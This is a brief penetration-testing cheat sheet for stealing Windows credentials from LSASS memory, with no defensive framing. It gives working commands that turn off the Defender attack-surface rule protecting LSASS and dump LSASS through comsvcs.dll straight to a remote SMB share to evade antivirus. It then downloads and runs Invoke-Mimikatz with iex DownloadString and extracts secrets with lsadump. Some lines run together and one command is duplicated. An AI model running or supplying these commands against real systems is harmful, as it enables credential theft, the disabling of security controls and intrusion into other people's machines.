Link
Dumping LSASS via ComSvcs works as of 10/29/2021
Break ASR for dumping LSASS
Set-MpPreference -AttackSurfaceReductionRules_Ids 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 -AttackSurfaceReductionRules_Actions DisableCreate a file share on Kali or elsewhere that you can immediately transfer the dump file to. We do this as some A/V and EDR solutions will delete the file if placed on disk.
smbserver.py share . -smb2supportFrom Windows -
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id \\192.168.1.44\share\lsass-comsvcs.dmp fullC:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id \\192.168.1.44\share\lsass-comsvcs.dmp fullThe file should be transferred to you machine now
Import Mimikatz to PowerShell on another Windows host machine (can also use something like Pypykatz on Kali)
iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/dievus/PowerShellForPentesters/main/Tools/Invoke-Mimikatz.ps1')Change Mimikatz context to the LSASS dump
invoke-mimikatz -Command '"sekurlsa::minidump <directory>\lsass-comsvcs.dmp"'Can then run Mimikatz commands against the dump
invoke-mimikatz -Command '"lsadump::lsa /patch"'
